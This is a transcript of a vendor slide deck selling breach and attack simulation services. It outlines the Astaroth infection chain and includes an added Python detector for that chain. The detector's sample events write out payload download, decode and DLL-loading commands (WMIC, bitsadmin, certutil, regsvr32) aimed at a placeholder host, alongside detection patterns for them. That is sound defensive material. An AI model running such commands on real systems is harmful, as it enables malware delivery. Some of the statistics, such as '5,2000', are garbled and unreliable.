Post on 11-Aug-2020

TRANSCRIPT

Page 1: BREACH & ATTACK SIMULATION SERVICES · Global Media and digital marketing firm in the US, Europe & APAC · Validate security controls against APTs · Incident response readiness · Report

CONFIDENTIAL

BREACH & ATTACK SIMULATION SERVICES

Page 2: CYBERSECURITY

Quick Facts
- 5,2000: number of IoT device attacks
- 48% of email attachments are malicious
- 1 in 13 web requests lead to malware
- 4.1B data breaches in 2019
- $11.5B ransomware damages, with an attack every 14 seconds in 2019
- $6.3M: average cost of a breach
- Only 5% of companies' folders are protected
- $5.9M: cost of information loss
- 206 days: average time to identify a breach
- 50 days: the average cost in time of a malware attack
- 2,244: average number of hacker attacks in a day
- $2.6M: average cost of a malware attack on an organization
- 314 days: average lifecycle of a breach

Leading Industries Impacted
- The financial services industry incurs the highest cost from cybercrime, at an average of $18.3 million per organization
- Supply-chain attacks were up by 78% in 2019
- Estimated losses in 2019 for the healthcare industry: $25 billion

Page 3: BREACH & ATTACK

Example attack chain (Astaroth):
1. The attack begins with a spear-phishing email containing a link; the link leads to a ZIP archive that contains a BAT file.
2. WMIC downloads an XSL file (containing JavaScript).
3. WMIC once again downloads an XSL file. Multiple instances of Bitsadmin download encoded payloads.
4. Certutil decodes the downloaded payloads.
5. Regsvr32 loads a DLL. This DLL decrypts and injects another DLL into userinit (process hollowing).
6. The DLL that's loaded into userinit is a proxy that reads, decrypts, and reflectively loads a final DLL, which is the info-stealer Astaroth.

Attack phases:
1) RESEARCH: Attackers look for a weakness they can exploit.
2) STAGE ATTACK: Social engineering (phishing email spam with malware, a phone call, dressing like the night janitor, etc.) or an infrastructure weakness. Attackers may need to keep staging attacks until the desired information is obtained or the desired access to the network is achieved.
3) EXFILTRATE: The accessed data is exfiltrated from database and file servers back to the attacker over an HTTP-based path, FTP, Gopher, etc. Once the attacker maintains access to the system, exfiltration can proceed indefinitely.
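The chain above is built from living-off-the-land binaries, so the detection question for a defender is whether process-creation telemetry shows those binaries used in the abusive way rather than their normal way. The following Python is an added example, not part of the slide deck or Marlabs' tooling: it maps the four LOLBin stages named on the slide (WMIC/XSL, Bitsadmin, Certutil, Regsvr32) onto constructed process-creation events and reports how much of the chain one host exhibited, which also serves as a scoring function for a simulation run. The event format, the sample command lines, the hostnames and the escalation threshold are all assumptions.

```python
import re

# Constructed process-creation events (not telemetry from the engagement),
# written in a simple key=value form so the parser stays self-contained.
SAMPLE_EVENTS = [
    'parent=cmd.exe child=wmic.exe cmdline=wmic os get /format:"https://cdn.example.invalid/a.xsl"',
    "parent=wmic.exe child=bitsadmin.exe cmdline=bitsadmin /transfer j1 https://cdn.example.invalid/p.enc C:\\Users\\Public\\p.enc",
    "parent=cmd.exe child=certutil.exe cmdline=certutil -decode C:\\Users\\Public\\p.enc C:\\Users\\Public\\p.dll",
    "parent=cmd.exe child=regsvr32.exe cmdline=regsvr32 /s C:\\Users\\Public\\p.dll",
    "parent=explorer.exe child=wmic.exe cmdline=wmic os get caption",  # benign admin use
    "parent=mmc.exe child=certutil.exe cmdline=certutil -verify C:\\certs\\root.cer",  # benign
]

EVENT_RE = re.compile(r"parent=(?P<parent>\S+) child=(?P<child>\S+) cmdline=(?P<cmd>.*)")

# One rule per LOLBin stage named on the slide: (stage, child image, command-line
# pattern, ATT&CK technique). The pattern is what separates abuse from normal use.
STAGE_RULES = [
    ("WMIC downloads XSL", "wmic.exe", re.compile(r'/format:\s*"?https?://', re.I), "T1220"),
    ("Bitsadmin downloads payload", "bitsadmin.exe", re.compile(r"/transfer\b", re.I), "T1197"),
    ("Certutil decodes payload", "certutil.exe", re.compile(r"-decode\b", re.I), "T1140"),
    ("Regsvr32 loads DLL", "regsvr32.exe", re.compile(r"\.dll\b", re.I), "T1218.010"),
]
STAGE_ORDER = [rule[0] for rule in STAGE_RULES]

def parse_event(line):
    """Parse one constructed event line into a dict, or None if malformed."""
    match = EVENT_RE.match(line)
    return match.groupdict() if match else None

def match_stages(lines):
    """Return (stage, technique, cmdline) for every event that matches a stage rule."""
    hits = []
    for event in filter(None, map(parse_event, lines)):
        for stage, image, pattern, technique in STAGE_RULES:
            if event["child"].lower() == image and pattern.search(event["cmd"]):
                hits.append((stage, technique, event["cmd"]))
    return hits

def chain_coverage(lines, min_stages=3):
    """Summarise which chain stages one host showed and whether that crosses the
    escalation threshold; the same output scores a simulation (seen vs. expected)."""
    hits = match_stages(lines)
    stages = sorted({h[0] for h in hits}, key=STAGE_ORDER.index)
    return {"stages": stages, "techniques": sorted({h[1] for h in hits}),
            "escalate": len(stages) >= min_stages}

if __name__ == "__main__":
    print(chain_coverage(SAMPLE_EVENTS))
```

Two benign events are included so the rules can be checked for false positives: plain `wmic os get` and `certutil -verify` match no stage.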

Page 4: BREACH & ATTACK

OUTPUT
Detailed reports of the status and performance of security controls and processes. The taxonomy consists of a common lexicon that enables business stakeholders, cyber defenders, and vendors to communicate clearly on the exact nature of a threat and on the objective assessment of the cyber defense plan that can defeat it.

SIMULATIONS
Ransomware attacks, (spear) phishing and whaling attacks, or clicking on malicious banners and links on websites; the full attack and expanded kill chain used by cyber attackers against enterprise infrastructure, using software test points that allow testing across roaming laptops, user desktops, virtual machines, or cloud infrastructure.

APPROACH
- Methodically select and analyze attacks, compare them to the capabilities of an organization's security controls, identify the gaps and mitigate with security controls aligned to the organization's budgets.
- Defense-in-depth architecture includes detective controls designed to monitor and alert on anomalous activity.
- Assess the effectiveness of security procedures, infrastructure, vulnerabilities, and techniques by using breach and attack simulation platforms; expose vulnerability gaps with their respective configurations.

MARLABS' CYBERSECURITY – METHODOLOGY & FRAMEWORKS
NIST, MITRE

RESPONSE TO CISO'S KEY QUESTIONS
- What is our risk of a successful breach by threat actors such as APT29?
- Are we protected, such as against APT29?

Page 5: ENGAGEMENT MODEL
- Assessments
- Workshops
- Implementation & deployment
- Managed Services

Page 6: CASE STUDY: BREACH AND ATTACK SIMULATION

Client: Global Media and digital marketing firm in the US, Europe & APAC

Business Challenges
- Validate security controls against APTs
- Incident response readiness
- Report weaknesses in each phase of the kill chain

Solution Highlights
- Workshop-based delivery model
- Recommendation on detection improvement
- Coverage of TTPs w.r.t. the MITRE ATT&CK Matrix

Business Benefits
- Proactive threat mitigation
- Improved visibility
- Augmented security controls
- Maximized existing cyber security investments

Page 7: BRINGING TOGETHER TECHNOLOGY, CULTURE AND VALUE TO HELP ENTERPRISES GET READY FOR CHANGE

THANK YOU